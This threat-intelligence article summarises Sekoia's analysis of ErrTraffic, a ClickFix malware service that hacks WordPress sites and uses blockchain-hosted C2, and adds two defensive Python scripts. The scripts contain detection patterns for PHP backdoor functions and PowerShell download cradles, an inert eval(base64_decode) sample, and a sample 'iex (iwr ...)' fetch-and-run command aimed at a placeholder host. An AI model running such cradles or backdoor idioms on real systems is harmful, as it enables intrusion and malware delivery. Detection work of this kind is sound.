At a glance
| Field | Detail |
|---|---|
| Malware family | ErrTraffic (ClickFix distribution framework / TDS, sold as MaaS) |
| Threat actor | Sold by “LenAI”; rental “Beer” cluster and source-code “Analytics” cluster (Sekoia high-confidence assessments) |
| Target / victims | Visitors to compromised WordPress sites; developers and AI users via fake AI platform sites |
| Delivery vector | ClickFix lures (fake CAPTCHA, blue screen, font glitches) on hacked WordPress; suspected malvertising |
| Key capabilities | EtherHiding blockchain C2, geo/OS-filtering TDS, PowerShell payload delivery, PHP backdoors |
| Source | Sekoia TDR, building on HudsonRock, LevelBlue, and Monarx |
TL;DR
Sekoia has published a detailed analysis of ErrTraffic, a fast-growing ClickFix distribution framework sold as a service. The toolkit injects malicious JavaScript into hacked WordPress sites and tricks visitors into running PowerShell. To stay hidden, it pulls its C2 address from the Polygon blockchain using a technique called EtherHiding.
Delivery: ClickFix lures on hacked sites
The campaign starts on compromised WordPress sites. Attackers inject a small block of JavaScript into otherwise legitimate pages. That script then renders a ClickFix lure over the content. Victims see a fake Cloudflare or reCAPTCHA check, a Windows blue screen, or broken-font “glitch” errors. Each lure pushes the same request: press a keyboard shortcut to “fix” the issue. That shortcut pastes a hidden PowerShell command from the clipboard, and running it downloads the real payload.
Attackers also spread the lure through fake AI download sites. Pages posing as Google Antigravity and ChatGPT serve the same trick, likely via malvertising. Sekoia calls these fake pages “empty shells whose sole purpose is to deliver” payloads. They target developers and AI users, a group that often holds elevated access.
How the infection chain works

Initial access rarely involves an exploit. Instead, attackers log in with stolen administrator credentials. Sekoia traced one breach to credential stuffing routed through residential proxies. Once inside, the operator plants a PHP backdoor as a WordPress MU-plugin. MU-plugins load automatically and resist removal from the admin panel. The backdoor injects ErrTraffic, serves the ClickFix lure, and opens a webshell. In one case, the operators also tried CVE-2020-25213, a known WP File Manager flaw, as an automated fallback. It failed because the plugin was absent. The implant adds further capabilities, including credential harvesting, WooCommerce order skimming, and evasion that pauses activity when scanners like Wordfence appear.
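The MU-plugin persistence described above is something a site administrator can audit directly, because every file in wp-content/mu-plugins loads on every request. The script below is an added example, not Sekoia's tooling and not anything from the ErrTraffic kit: it snapshots SHA-256 digests of the mu-plugins tree as a file-integrity baseline, re-audits the directory later, and reports new, modified or removed files, scanning any PHP among them for backdoor-style primitives. The directory layout, the primitive list and the planted sample file are constructed assumptions for illustration.

```python
"""
Audit a WordPress mu-plugins directory for unexpected auto-loading PHP.
Added example (not Sekoia's or ErrTraffic's code); token list and the
demo directory tree are constructed assumptions.
"""
import hashlib
import json
import re
import tempfile
from pathlib import Path

# Primitives that legitimate mu-plugins rarely need but PHP backdoors lean on (assumed; tune per site).
SUSPICIOUS_PHP = re.compile(
    r"\b(eval|assert|system|passthru|shell_exec|base64_decode|gzinflate|str_rot13)\s*\(",
    re.IGNORECASE,
)


def sha256_file(path: Path) -> str:
    """Stream a file through SHA-256 so large plugin bundles do not load into memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(mu_dir: Path) -> dict[str, str]:
    """Map each file (path relative to mu-plugins) to its digest; this is the trusted baseline."""
    return {
        str(p.relative_to(mu_dir)): sha256_file(p)
        for p in sorted(mu_dir.rglob("*"))
        if p.is_file()
    }


def audit(mu_dir: Path, baseline: dict[str, str]) -> list[dict]:
    """Compare the live directory against the baseline and flag drift.

    One finding per new, modified or removed file. PHP files that changed are
    also scanned for backdoor-style primitives so an implant stands out even
    when the reviewer has not yet read the diff.
    """
    current = snapshot(mu_dir)
    findings = []
    for rel in sorted(set(baseline) | set(current)):
        if rel not in baseline:
            status = "new"
        elif rel not in current:
            status = "removed"
        elif baseline[rel] != current[rel]:
            status = "modified"
        else:
            continue
        finding = {"file": rel, "status": status, "indicators": []}
        path = mu_dir / rel
        if status != "removed" and path.suffix.lower() == ".php":
            text = path.read_text(errors="replace")
            finding["indicators"] = sorted({m.group(1).lower() for m in SUSPICIOUS_PHP.finditer(text)})
        findings.append(finding)
    return findings


def demo() -> list[dict]:
    """Build a constructed mu-plugins tree, baseline it, then simulate an intrusion."""
    with tempfile.TemporaryDirectory() as tmp:
        mu = Path(tmp) / "wp-content" / "mu-plugins"
        mu.mkdir(parents=True)
        (mu / "site-tweaks.php").write_text("<?php add_filter('show_admin_bar', '__return_false');\n")
        baseline = snapshot(mu)  # taken while the site is known-clean
        # Constructed stand-in for a dropped implant: an inert eval of a fixed string, not real malware.
        (mu / "wp-cache-helper.php").write_text("<?php eval(base64_decode('Y29uc3RydWN0ZWQ='));\n")
        # Constructed tampering of an existing, legitimate file.
        (mu / "site-tweaks.php").write_text("<?php /* tampered */\n")
        return audit(mu, baseline)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

In production the baseline would be written to storage outside the web root (or to a separate host) right after a verified-clean deployment, and `audit` would run from cron or a FIM agent; a hit with status `new` in mu-plugins is worth treating as an incident rather than a warning, since nothing in a normal content workflow writes there.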
Blockchain C2 and payload delivery
ErrTraffic hides its infrastructure on-chain. The injected script queries a Polygon smart contract to resolve the current C2 domain. This EtherHiding approach lets operators rotate servers without touching the injected code. As Sekoia notes, it works “across thousands of compromised sites” and resists takedowns. Communications in the main rental cluster use RC4 encryption. The PowerShell command then fetches a final payload tailored by geolocation and operating system. Observed payloads include Vidar, Stealc, Remus, and Salat infostealers, plus loaders like SmokeLoader, DanaBot, and HijackLoader.
A growing Malware-as-a-Service
ErrTraffic runs on a rental model. Sekoia tracked the operator, LenAI, advertising it since December 2025. Monthly access rose from $300 to $380. The source code climbed from $1,500 in January to $4,500 with lifetime support. A queue-based system limits rental spots to keep the tool quiet. This pricing and exclusivity point to a healthy criminal business.
Detection and defense guidance
ErrTraffic blends into trusted-looking pages, so defenders need layered detection. Enable PowerShell ScriptBlock logging to capture the decoded commands. Watch for blockchain RPC calls followed quickly by PowerShell execution. Audit the WordPress mu-plugins directory and use server-side file-integrity monitoring. Rotate WordPress credentials and enforce strong multi-factor authentication.
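The second item of that guidance, an on-chain C2 lookup (the EtherHiding step described under "Blockchain C2 and payload delivery") followed quickly by PowerShell, is a sequence detection, and it helps to see the correlation run over concrete telemetry. The Python below is an added example, not a Sekoia rule: it parses constructed JSON-line records (a browser contacting a public Polygon RPC endpoint, then an Event ID 4104 script block on the same host), joins them within a 90-second window, and grades the script block for download-cradle and hidden-window idioms. The RPC host list, log schema, window length and marker patterns are assumptions to tune per environment.

```python
"""
Correlate blockchain RPC contact with a following PowerShell ScriptBlock event.
Added example (not Sekoia's detection content); host list, schema and the
sample records are constructed assumptions.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta
import json
import re

# Public RPC endpoints an ordinary browsing session has little reason to contact (assumed list).
BLOCKCHAIN_RPC_HOSTS = {"polygon-rpc.com", "rpc.ankr.com", "rpc-mainnet.matic.network"}
WINDOW = timedelta(seconds=90)  # RPC lookup -> PowerShell must occur within this window

# Idioms typical of pasted ClickFix commands (assumed; extend from your own ScriptBlock logs).
SCRIPT_MARKERS = {
    "download_cradle": re.compile(r"\b(iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring)\b", re.I),
    "invoke_expression": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "base64": re.compile(r"frombase64string|-enc(?:odedcommand)?\b", re.I),
}

# Constructed sample telemetry as JSON lines; hostnames and URLs are placeholders, not real IoCs.
SAMPLE_LOGS = """
{"ts":"2026-03-02T10:14:02Z","host":"WS01","event":"net_conn","process":"chrome.exe","dest":"polygon-rpc.com"}
{"ts":"2026-03-02T10:14:41Z","host":"WS01","event":"ps_scriptblock","event_id":4104,"script":"powershell -w hidden -c \\"iex (iwr 'http://lure.invalid/p')\\""}
{"ts":"2026-03-02T10:20:00Z","host":"WS02","event":"net_conn","process":"chrome.exe","dest":"rpc.ankr.com"}
{"ts":"2026-03-02T11:05:00Z","host":"WS02","event":"ps_scriptblock","event_id":4104,"script":"Get-ChildItem C:\\\\Users"}
{"ts":"2026-03-02T11:06:00Z","host":"WS03","event":"ps_scriptblock","event_id":4104,"script":"iex (irm http://lure.invalid/q)"}
"""


def parse(lines: str) -> list[dict]:
    """Decode JSON lines into records with timezone-aware timestamps, oldest first."""
    records = []
    for line in lines.strip().splitlines():
        rec = json.loads(line)
        rec["ts"] = datetime.fromisoformat(rec["ts"].replace("Z", "+00:00"))
        records.append(rec)
    return sorted(records, key=lambda r: r["ts"])


def script_markers(script: str) -> list[str]:
    """Names of the idioms present in one script block, in SCRIPT_MARKERS order."""
    return [name for name, rx in SCRIPT_MARKERS.items() if rx.search(script)]


def correlate(records: list[dict]) -> list[dict]:
    """Emit one alert per script block that follows an RPC contact on the same host.

    'high'   = RPC contact within WINDOW and the script shows cradle/evasion markers
    'medium' = the sequence alone
    'low'    = markers but no preceding RPC contact (kept visible, not dropped)
    """
    recent_rpc: dict[str, deque] = defaultdict(deque)
    alerts = []
    for rec in records:
        host = rec["host"]
        if rec["event"] == "net_conn" and rec["dest"] in BLOCKCHAIN_RPC_HOSTS:
            recent_rpc[host].append(rec)
            continue
        if rec["event"] != "ps_scriptblock":
            continue
        q = recent_rpc[host]
        while q and rec["ts"] - q[0]["ts"] > WINDOW:  # expire stale RPC contacts
            q.popleft()
        markers = script_markers(rec["script"])
        if q:
            rpc = q[-1]
            alerts.append({
                "host": host,
                "severity": "high" if markers else "medium",
                "rpc_dest": rpc["dest"],
                "delta_s": int((rec["ts"] - rpc["ts"]).total_seconds()),
                "markers": markers,
            })
        elif markers:
            alerts.append({"host": host, "severity": "low", "rpc_dest": None, "delta_s": None, "markers": markers})
    return alerts


if __name__ == "__main__":
    for alert in correlate(parse(SAMPLE_LOGS)):
        print(json.dumps(alert))
```

The low-severity branch is deliberate: proxy or DNS logging may miss the RPC contact (or it may come from a different process than the browser), so a pasted download cradle should still surface on its own, just with less confidence than the full sequence.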
Attribution stays mixed. The seller handle “LenAI” is confirmed on cybercrime forums. Sekoia assesses with high confidence that LenAI runs the rental “Beer” cluster. A separate actor likely bought older source code to run the “Analytics” cluster, though their identity remains unknown. Affiliates praise the toolkit; one even claimed a “10% rate, which is impressive.” For the full technical breakdown, read Sekoia’s analysis of the ErrTraffic ClickFix framework. Expect this ClickFix attack ecosystem to keep growing.